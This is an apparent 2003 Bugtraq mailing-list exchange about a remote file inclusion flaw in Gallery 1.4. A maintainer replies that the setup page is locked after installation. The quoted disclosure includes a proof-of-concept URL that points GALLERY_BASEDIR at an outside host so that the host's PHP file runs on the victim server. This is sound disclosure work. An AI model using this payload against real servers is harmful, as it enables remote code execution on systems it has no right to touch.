The URL you mention is accessible only during the setup of Gallery. Completing the installation, the user runs secure.sh or secure.bat which "chmod 0 setup" making the vulnerability you mention inaccessible to the web. Brent Meshier Global Transport Logistics, Inc. 2770 Fortune Circle Drive Indianapolis, IN 46241 (317) 481-0527 x23 Direct (317) 481-0177 Fax http://www.gtlogistics.com/ -----Original Message----- From: Peter Stöckli [mailto:pcs@rootquest.com] Sent: Saturday, October 11, 2003 11:13 AM To: bugtraq@securityfocus.com Subject: Gallery 1.4 including file vulnerability -Proof of concept- It is possible to include any php file from a remote host, and execute it on the target's server. This works: http://victim/path_to_gallery/setup/index.php?GALLERY_BASEDIR=http://tes ter/ If the file "http://tester/util.php"; exists, it will be included.
